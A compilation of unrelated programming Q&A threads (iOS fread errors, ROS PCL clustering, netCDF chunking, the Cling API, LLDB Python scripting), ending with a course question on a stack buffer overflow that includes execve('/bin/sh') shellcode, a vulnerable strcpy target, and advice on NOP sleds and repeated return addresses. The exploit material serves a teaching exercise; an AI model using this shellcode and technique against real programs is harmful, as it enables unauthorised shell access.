fread failure issue (iOS 64-bit environment) - ios

My problem is that the code below works fine on other platforms, but on iOS 64-bit it doesn't.
The details are in the following code:
// FILE* f = fopen( .. ); // f is opened and has already been used successfully.
// The target file is about 50 MB.
fseek(f, 0, SEEK_END);
// print ftell(f) -> 53394002
fseek(f, -1024, SEEK_END);
// print ftell(f) -> 53392978
fread(buf, 1, 1024, f); // returns 0.
ferror(f);              // returns 3.
// print ftell(f) -> 53392978
fseek(f, 0, SEEK_END);
// print ftell(f) -> 53394002
When I tried fgetc() (just as a test), the result was the same.
One strange thing is the return value 3 from ferror().
I heard that value means ESRCH ("No such process"), and most of the documents I found say it is unrelated to reading files.
Could you give me some advice, please?

The return value from ferror() is not the error number; it is zero for no error and non-zero for an error. If you want to know the error number, check errno. It would be better to show the full code including the tests on the return values from fseek(), and so on.
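As an illustrative sketch (my addition, not part of the original answer, and the file name is just a placeholder), capturing errno right after the failing call and translating it with strerror() looks like this:
#include <errno.h>
#include <stdio.h>
#include <string.h>

int main(void)
{
    FILE *f = fopen("big.file", "rb");   /* placeholder file name */
    if (f == NULL)
    {
        perror("fopen");
        return 1;
    }
    char buf[1024];
    if (fseek(f, -1024, SEEK_END) != 0)
        perror("fseek");
    errno = 0;                           /* clear errno before the call under test */
    size_t n = fread(buf, 1, sizeof(buf), f);
    if (n == 0 && ferror(f))
        fprintf(stderr, "fread failed: errno=%d (%s)\n", errno, strerror(errno));
    fclose(f);
    return 0;
}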
I can't reproduce your problem on my Mac. I created a big file which is the same size as yours:
$ ls -l big.file
-rw-r--r-- 1 jleffler staff 53394002 Oct 5 19:57 big.file
$
Code
#include <stdio.h>

int main(int argc, char **argv)
{
    const char *filename = "big.file";
    if (argc > 1)
        filename = argv[1];
    FILE *f = fopen(filename, "r");
    if (f == 0)
    {
        perror(filename);
        return 1;
    }
    if (fseek(f, 0, SEEK_END) != 0)
        perror("fseek END 1");
    printf("EOF %ld\n", ftell(f));
    if (fseek(f, -1024, SEEK_END) != 0)
        perror("fseek END 2");
    printf("POS %ld\n", ftell(f));
    char buf[1024];
    size_t n = fread(buf, 1, 1024, f); // OP reports returns 0.
    printf("N = %zu\n", n);
    int r = ferror(f); // OP reports returns 3.
    printf("r = %d\n", r);
    printf("POS %ld\n", ftell(f));
    if (fseek(f, 0, SEEK_END) != 0)
        perror("fseek END 3");
    printf("POS %ld\n", ftell(f));
    fclose(f);
    return 0;
}
This is not great code: it doesn't abandon ship on detecting errors (perror() returns after printing), and it does not show the data that is read so it could be compared with what's in the file (which was generated with a random data generator and then truncated to the precise length of your file with GNU truncate).
Compilation and run
$ gcc -O3 -g -std=c11 -Wall -Wextra -Werror bf19.c -o bf19
$ ./bf19
EOF 53394002
POS 53392978
N = 1024
r = 0
POS 53394002
POS 53394002
$
This indicates that the code works on my Mac running macOS Sierra 10.12 and GCC 6.2.0. Your problem, therefore, is in code that you've not shown. Adapt your code so it can be compiled and run and show a minimal test case like this one that reproduces the problem. For guidance on how to do it, read about:
MCVE (How to create a Minimal, Complete, and Verifiable Example?)
SSCCE (Short, Self-Contained, Correct Example)

Related

How to send clusters in separate nodes (ROS PCL)

Hi, I'm new to the Point Cloud Library. I'm trying to show the clustering result points in RViz or the PCL viewer, but nothing shows up. I also realized that my data shows nothing when I subscribe to the topic and cout it. I hope someone can help with my problem, thanks.
This is my code for the clustering and publishing node:
void cloudReceive(const sensor_msgs::PointCloud2ConstPtr& inputMsg){
    mutex_lock.lock();
    pcl::fromROSMsg(*inputMsg, *inputCloud);
    cout << inputCloud << endl;
    pcl::search::KdTree<pcl::PointXYZRGB>::Ptr tree (new pcl::search::KdTree<pcl::PointXYZRGB>);
    tree->setInputCloud(inputCloud);
    std::vector<pcl::PointIndices> cluster_indices;
    pcl::EuclideanClusterExtraction<pcl::PointXYZRGB> ec;
    ec.setClusterTolerance(0.03); // 2cm
    ec.setMinClusterSize(200);    // min points
    ec.setMaxClusterSize(1000);   // max points
    ec.setSearchMethod(tree);
    ec.setInputCloud(inputCloud);
    ec.extract(cluster_indices);

    if(cluster_indices.size() > 0){
        std::vector<pcl::PointIndices>::const_iterator it;
        int i = 0;
        for (it = cluster_indices.begin(); it != cluster_indices.end(); ++it){
            if(i >= 10)
                break;
            cloud_cluster[i]->points.clear();
            std::vector<int>::const_iterator idx_it;
            for (idx_it = it->indices.begin(); idx_it != it->indices.end(); idx_it++)
                cloud_cluster[i]->points.push_back(inputCloud->points[*idx_it]);
            cloud_cluster[i]->width = cloud_cluster[i]->points.size();
            // cloud_cluster[i]->height = 1;
            // cloud_cluster[i]->is_dense = true;
            cout << "PointCloud representing the Cluster: " << cloud_cluster[i]->points.size() << " data points" << endl;
            std::stringstream ss;
            ss << "cobaa_pipecom2_cluster_" << i << ".pcd";
            writer.write<pcl::PointXYZRGB> (ss.str(), *cloud_cluster[i], false);
            pcl::toROSMsg(*cloud_cluster[i], outputMsg);
            // cout << "data = " << outputMsg << endl;
            cloud_cluster[i]->header.frame_id = FRAME_ID;
            pclpub[i++].publish(outputMsg);
            // i++;
        }
    }
    else
        ROS_INFO_STREAM("0 clusters extracted\n");
}
And this is the main function:
int main(int argc, char** argv){
    for (int z = 0; z < 10; z++) {
        // std::cout << " - clustering/" << z << std::endl;
        cloud_cluster[z] = pcl::PointCloud<pcl::PointXYZRGB>::Ptr(new pcl::PointCloud<pcl::PointXYZRGB>);
        cloud_cluster[z]->height = 1;
        cloud_cluster[z]->is_dense = true;
        // cloud_cluster[z]->header.frame_id = FRAME_ID;
    }
    ros::init(argc, argv, "clustering");
    ros::NodeHandlePtr nh(new ros::NodeHandle());
    pclsub = nh->subscribe("/pclsegmen", 1, cloudReceive);
    std::string pub_str("clustering/0");
    for (int z = 0; z < 10; z++) {
        pub_str[11] = z + 48; // 48 = '0' (ASCII)
        // z++;
        pclpub[z] = nh->advertise <sensor_msgs::PointCloud2> (pub_str, 1);
    }
    // pclpub = nh->advertise<sensor_msgs::PointCloud2>("/pclcluster",1);
    ros::spin();
}
This isn't an exact answer, but I think it addresses your issue and may ease your debugging.
RViz can directly subscribe to a published point cloud, i.e. the one I'm assuming you're trying to see in the cloudReceive callback. If you set the Frame to whichever frame it's being published in, and add it from the available topics, you should see the points. (That is easier than trying to rebroadcast it as different topics.)
Also, I recommend looking at the rostopic command-line tool. You can do rostopic list to check whether the topic is being published, rostopic bw to see if it's really publishing the expected volume of data (e.g. bytes vs kilobytes vs megabytes), rostopic hz to see how frequently (if ever) it's publishing, and (briefly) rostopic echo to look at the data itself. (This is me assuming from your question that it's more an issue with the data coming into your node.)
If you're having trouble not with data coming into the node, nor with the visualization of point cloud data in general, but with the transformed data that's supposed to come out of the node, I would check that the clustering worked, and reduce your code to just one publisher publishing something, as in the sketch below. You may be doing something weird, like messing up your pointers. You could also turn on stronger compilation warnings for your node with -Wall -Wextra -Werror, or step through its execution via gdb (launch-prefix="xterm -e gdb --args").
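As a rough illustration of that last suggestion (my sketch, not part of the original answer; the node name, topic name, and frame id are placeholders), a stripped-down node that publishes a single small cloud might look like:
#include <ros/ros.h>
#include <sensor_msgs/PointCloud2.h>
#include <pcl/point_cloud.h>
#include <pcl/point_types.h>
#include <pcl_conversions/pcl_conversions.h>

int main(int argc, char** argv)
{
    ros::init(argc, argv, "single_cluster_pub");   // placeholder node name
    ros::NodeHandle nh;
    ros::Publisher pub = nh.advertise<sensor_msgs::PointCloud2>("/debug_cluster", 1); // placeholder topic

    // Build a tiny dummy cloud so the RViz pipeline can be verified end to end.
    pcl::PointCloud<pcl::PointXYZRGB> cloud;
    pcl::PointXYZRGB pt;
    pt.x = 0.0f; pt.y = 0.0f; pt.z = 0.0f;
    pt.r = 255; pt.g = 0; pt.b = 0;
    cloud.points.push_back(pt);
    cloud.width = cloud.points.size();
    cloud.height = 1;
    cloud.is_dense = true;

    sensor_msgs::PointCloud2 msg;
    pcl::toROSMsg(cloud, msg);
    msg.header.frame_id = "map";                   // placeholder; match your RViz Fixed Frame

    ros::Rate rate(1);
    while (ros::ok()) {
        msg.header.stamp = ros::Time::now();
        pub.publish(msg);
        rate.sleep();
    }
    return 0;
}
If this shows up in RViz but your clustering node's output does not, the problem is in the clustering/publishing logic rather than in RViz or the transport.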
The solution is that I changed the ASCII arithmetic into lexical_cast. Thanks for your responses; I hope this can help others.
for (int z = 0; z < CLOUD_QTD; z++) {
    // pub_str[11] = z + 48;
    std::string topicName = "/pclcluster/" + boost::lexical_cast<std::string>(z);
    global::pub[z] = n.advertise <sensor_msgs::PointCloud2> (topicName, 1);
}
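As a side note (my addition, not part of the original answer), std::to_string from C++11 gives the same result without Boost:
std::string topicName = "/pclcluster/" + std::to_string(z);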

Corrupted netCDF output file related to chunk size or dimension naming

I noticed that in the following program the created netCDF file is corrupted, i.e., executing ncdump -h out.nc produces errors.
#include <netcdf>

/**
 * This file produces a corrupted nc output file.
 * Compile with `g++ -std=c++11 -o test test.cpp -lnetcdf -lnetcdf_c++4`
 */

// This is the first non-working chunk size.
// It does work with 1048576, which is exactly 2^20.
#define CHUNK_SIZE 1048577

using namespace std;
using namespace netCDF;
using namespace netCDF::exceptions;

int main()
{
    typedef std::vector<size_t> vs;
    typedef std::vector<netCDF::NcDim> vd;
    try
    {
        NcFile outFile = NcFile("out.nc", NcFile::replace);
        // create the dimensions complying to the AMBER specs
        NcDim frameDim = outFile.addDim("frame");
        NcDim atomDim = outFile.addDim("atom");
        NcDim spatialDim = outFile.addDim("spatial", 3);
        NcDim radiusDim = outFile.addDim("radius", 1);
        // create the variables
        NcVar coords = outFile.addVar("coordinates", ncFloat, vd({frameDim, atomDim, spatialDim}));
        NcVar radii = outFile.addVar("radius", ncFloat, vd({frameDim, atomDim}));
        // set up chunking
        vs chunk_coords({1, CHUNK_SIZE, 3});
        vs chunk_radii({1, CHUNK_SIZE, 1});
        coords.setChunking(NcVar::nc_CHUNKED, chunk_coords);
        radii.setChunking(NcVar::nc_CHUNKED, chunk_radii);
        // set up compression
        coords.setCompression(false, true, 1);
        radii.setCompression(false, true, 1);
        return 0;
    }
    catch (NcException& e)
    {
        return -1;
    }
}
The out.nc becomes a valid and working netcdf file when ...
... the CHUNK_SIZE becomes less than 1048577
... CHUNKING is disabled
... the unused "radius" dimension is named differently or not added at all
Note that the largest working CHUNK_SIZE, 1048576, is exactly 2^20.
What causes this behaviour? It is easy to work around by renaming the radius dimension, but I am still curious why this is in any way related to the chunking of HDF5/netCDF.
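For reference, the renaming workaround mentioned above only needs the dimension to stop sharing its name with the non-coordinate "radius" variable; the replacement name below is arbitrary:
// Hypothetical rename: the unused dimension no longer collides with the "radius" variable.
NcDim radiusDim = outFile.addDim("radius_dim", 1);
NcVar radii = outFile.addVar("radius", ncFloat, vd({frameDim, atomDim}));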

Cling API available?

How can I use Cling in my app via its API to interpret C++ code?
I expect it to provide a terminal-like way of interacting without the need to compile and run an executable. Let's say I have a hello world program:
#include <iostream>

int main() {
    std::cout << "Hello world!" << std::endl;
}
I expect an API that lets me execute a char* (the program code) and get back char *output = "Hello world!". Thanks.
P.S. Something similar to this Ch interpreter example:
/* File: embedch.c */
#include <stdio.h>
#include <embedch.h>

char *code = "\
    int func(double x, int *a) { \
        printf(\"x = %f\\n\", x); \
        printf(\"a[1] in func=%d\\n\", a[1]); \
        a[1] = 20; \
        return 30; \
    }";

int main () {
    ChInterp_t interp;
    double x = 10;
    int a[] = {1, 2, 3, 4, 5}, retval;
    Ch_Initialize(&interp, NULL);
    Ch_AppendRunScript(interp, code);
    Ch_CallFuncByName(interp, "func", &retval, x, a);
    printf("a[1] in main=%d\n", a[1]);
    printf("retval = %d\n", retval);
    Ch_End(interp);
}
There is finally a better answer: example code! See https://github.com/root-project/cling/blob/master/tools/demo/cling-demo.cpp
And the answer to your question is: no. Cling takes code and returns C++ values or objects, across compiled and interpreted code. It's not a "string in / string out" kind of thing. There's Perl for that ;-) This is what code in, value out looks like:
// We could use a header, too...
interp.declare("int aGlobal;\n");
cling::Value res; // Will hold the result of the expression evaluation.
interp.process("aGlobal;", &res);
std::cout << "aGlobal is " << res.getAs<long long>() << '\n';
Apologies for the late reply!
Usually the way one does it is:
[cling$] #include "cling/Interpreter/Interpreter.h"
[cling$] const char* someCode = "int i = 123;";
[cling$] gCling->declare(someCode);
[cling$] i // You will have i declared:
(int) 123
The API is documented in: http://cling.web.cern.ch/cling/doxygen/classcling_1_1Interpreter.html
Of course you can create your own 'nested' interpreter in cling's runtime too. (See the doxygen link above)
I hope this helps and answers the question; you can find more usage examples under the test/ folder.
Vassil

LLDB Python access of iOS variables?

As part of debugging a problem that might be related to my UIViews, I want to write a Python script to run from LLDB. I thought I would extract all the settings for a view at a breakpoint, plus all the view's children, to allow me to compare states. I checked out the WWDC video on the topic and then spent time reading things at lldb.llvm.org/scripting.html, and didn't find them very helpful. A web search for examples led to nothing substantially different from those.
My problem is that I'm trying to figure out how to access iOS variables at my breakpoint. The examples I've seen do things like convert numbers and mimic shell commands. Interesting stuff but not useful for my purposes. I've been reading my way through the help info with "script help(lldb.SBValue)" and the like, but it is slow going as the results are huge and it is not clear what the use patterns are. I feel like one decent example of how to traverse a few iOS objects would help me understand the system. Does anyone know of one or can share a snippet of code?
UPDATE:
I wrote this to help me track down a bug in my UIView use. I want to do a bit more work to refine this to see if I could show the whole view tree, but this was sufficient to solve my problem, so I'll put it here to save others some time.
import lldb

max_depth = 6
filters = {'_view': 'UIView *', '_layer': 'CALayer *', '_viewFlags': 'struct'}

def print_value(var, depth, prefix):
    """ print values and recurse """
    global max_depth
    local_depth = max_depth - depth
    pad = ' ' * local_depth
    name = var.GetName()
    typ = str(var.GetType()).split('\n')[0].split('{')[0].split(':')[0].strip()
    found = name in filters.keys()  # only visit filter items' children
    if found:
        found = (filters.get(name) == typ)
    value = var.GetValue()
    if value is None or str(value) == '0x00000000':
        value = ''
    else:
        value = ' Val: %s' % value
    if var.GetNumChildren() == 0 and var.IsInScope():
        path = lldb.SBStream()
        var.GetExpressionPath(path)
        path = ' pathData: %s' % path.GetData()
    else:
        path = ''
    print '^' * local_depth, prefix, ' Adr:', var.GetAddress(), ' Name:', name, ' Type:', typ, value, path
    if var.GetNumChildren() > 0:
        if local_depth < 2 or found:
            print pad, var.GetNumChildren(), 'children, to depth', local_depth + 1
            counter = 0
            for subvar in var:
                subprefix = '%d/%d' % (counter, var.GetNumChildren())
                print_value(subvar, depth - 1, subprefix)
                counter += 1

def printvh(debugger, command_line, result, dict):
    """ print view hierarchy """
    global max_depth
    args = command_line.split()
    if len(args) > 0:
        var = lldb.frame.FindVariable(args[0])
        depth = max_depth
        if len(args) > 1:
            depth = int(args[1])
            max_depth = depth
        print_value(var, depth, 'ROOT')
    else:
        print 'pass a variable name and optional depth'
And I added the following to my .lldbinit:
script import os, sys
# So that files in my dir takes precedence.
script sys.path[:0] = [os.path.expanduser("~/lldbpy")]
script import views
command script add -f views.printvh printvh
so that I can just type "printvh self 3" at the LLDB prompt.
Maybe this will help. Here's an example of how to dump simple local variables when a breakpoint is hit. I'm not displaying char* arrays correctly; I'm not sure how I should get the data for those to display them the way "frame variable" would, but I'll figure that out later when I have a free minute.
struct datastore {
    int val1;
    int val2;
    struct {
        int val3;
    } subdata;
    char *name;
};

int main (int argc, char **argv)
{
    struct datastore data = {1, 5, {3}, "a string"};
    return data.val2;
}
Current executable set to 'a.out' (x86_64).
(lldb) br se -l 13
Breakpoint created: 1: file ='a.c', line = 13, locations = 1
(lldb) br comm add -s python
Enter your Python command(s). Type 'DONE' to end.
> def printvar_or_children(var):
>     if var.GetNumChildren() == 0 and var.IsInScope():
>         path = lldb.SBStream()
>         var.GetExpressionPath(path)
>         print '%s: %s' % (path.GetData(), var.GetValue())
>     else:
>         for subvar in var:
>             printvar_or_children(subvar)
>
> print 'variables visible at breakpoint %s' % bp_loc
> for var in frame.arguments:
>     printvar_or_children(var)
> for var in frame.locals:
>     printvar_or_children(var)
>
> DONE
(lldb) r
variables visible at breakpoint 1.1: where = a.out`main + 51 at a.c:13, address = 0x0000000100000f33, resolved, hit count = 1
argc: 1
*(*(argv)): '/'
data.val1: 1
data.val2: 5
data.subdata.val3: 3
*(data.name): 'a'
Process 84865 stopped
* thread #1: tid = 0x1f03, 0x0000000100000f33 a.out`main + 51 at a.c:13, stop reason = breakpoint 1.1
frame #0: 0x0000000100000f33 a.out`main + 51 at a.c:13
   10   int main (int argc, char **argv)
   11   {
   12       struct datastore data = {1, 5, {3}, "a string"};
-> 13       return data.val2;
(lldb)
Tip - for sanity's sake I worked on the python over in a side text editor and pasted it into lldb as I experimented.
If you use the frame variable command in lldb to explore your variables at a given stop location, that's the same basic way that you can access them via the SBFrame that is provided to your breakpoint python command in the 'frame' object.
Hope that helps to get you started.
Did you try looking at the Python LLDB formatting templates stored in:
Xcode.app/Contents/SharedFrameworks/LLDB.framework/Resources/Python/lldb/formatters/objc

Intentional buffer overflow exploit program

I'm trying to figure out this problem for one of my comp sci classes. I've utilized every resource and am still having issues; if someone could provide some insight, I'd greatly appreciate it.
I have this "target" in which I need to execute execve("/bin/sh") with a buffer overflow exploit. In the overflow of buf[128], when the unsafe strcpy executes, a pointer back into the buffer appears in the location where the system expects to find the return address.
target.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int bar(char *arg, char *out)
{
    strcpy(out, arg);
    return 0;
}

int foo(char *argv[])
{
    char buf[128];
    bar(argv[1], buf);
}

int main(int argc, char *argv[])
{
    if (argc != 2)
    {
        fprintf(stderr, "target: argc != 2");
        exit(EXIT_FAILURE);
    }
    foo(argv);
    return 0;
}
exploit.c
#include "shellcode.h"
#define TARGET "/tmp/target1"
int main(void)
{
char *args[3];
char *env[1];
args[0] = TARGET; args[1] = "hi there"; args[2] = NULL;
env[0] = NULL;
if (0 > execve(TARGET, args, env))
fprintf(stderr, "execve failed.\n");
return 0;
}
shellcode.h
static char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
I understand I need to fill argv[1] with more than 128 bytes, the bytes beyond 128 being the return address, which should point back into the buffer so that the /bin/sh within it executes. Is that correct so far? Can someone provide the next step?
Thanks very much for any help.
Well, so you want the program to execute your shellcode. It's already in machine form, so it's ready to be executed by the system. You've stored it in a buffer. So, the question would be "How does the system know to execute my code?" More precisely, "How does the system know where to look for the next code to be executed?" The answer in this case is the return address you're talking about.
Basically, you're on the right track. Have you tried executing the code? One thing I've noticed when performing this type of exploit is that it's not an exact science. Sometimes, there are other things in memory that you don't expect to be there, so you have to increase the number of bytes you add into your buffer in order to correctly align the return address with where the system expects it to be.
I'm not a specialist in security, but I can tell you a few things that might help. One is that I usually include a 'NOP sled': essentially just a series of 0x90 bytes that do nothing other than execute 'NOP' instructions on the processor. Another trick is to repeat the return address at the end of the buffer, so that if even one of the copies overwrites the saved return address on the stack, you'll have a successful return to where you want.
So, your buffer will look like this:
| NOP SLED | SHELLCODE | REPEATED RETURN ADDRESS |
(Note: These aren't my ideas, I got them from Hacking: The Art of Exploitation, by Jon Erickson. I recommend this book if you're interested in learning more about this).
To calculate the address, you can use something similar to the following:
unsigned long sp(void)
{ __asm__("movl %esp, %eax"); }   // returns the address of the stack pointer

int main(int argc, char *argv[])
{
    int i, offset;
    long esp, ret, *addr_ptr;
    char *buffer;

    offset = 0;
    esp = sp();
    ret = esp - offset;
}
Now, ret will hold the return address you want to return to, assuming that you allocate buffer to be on the heap.
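Putting the layout from the diagram above into code, a rough sketch of building such a buffer might look like this (my illustration, not a tested solution: BUF_LEN, the 16-byte return-address area, and ret itself are placeholders you would tune for the target):
#include <stdlib.h>
#include <string.h>
#include "shellcode.h"

#define BUF_LEN 160   /* placeholder: must exceed the 128-byte buf to reach the saved return address */

char *build_payload(long ret)
{
    char *buffer = (char *)malloc(BUF_LEN + 1);
    size_t code_len = sizeof(shellcode) - 1;   /* exclude the terminating NUL */
    size_t ret_area = 16;                      /* placeholder: last bytes hold copies of ret */
    size_t i;

    memset(buffer, 0x90, BUF_LEN);                                        /* 1. NOP sled        */
    memcpy(buffer + BUF_LEN - ret_area - code_len, shellcode, code_len);  /* 2. shellcode       */
    for (i = BUF_LEN - ret_area; i < BUF_LEN; i += sizeof(ret))
        memcpy(buffer + i, &ret, sizeof(ret));                            /* 3. repeated return address */

    buffer[BUF_LEN] = '\0';                    /* the target's strcpy stops at the first NUL */
    return buffer;
}
The payload must not contain interior NUL bytes, because the target copies it with strcpy; the shellcode in shellcode.h is written to avoid them, and the guessed return address normally avoids them as well.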
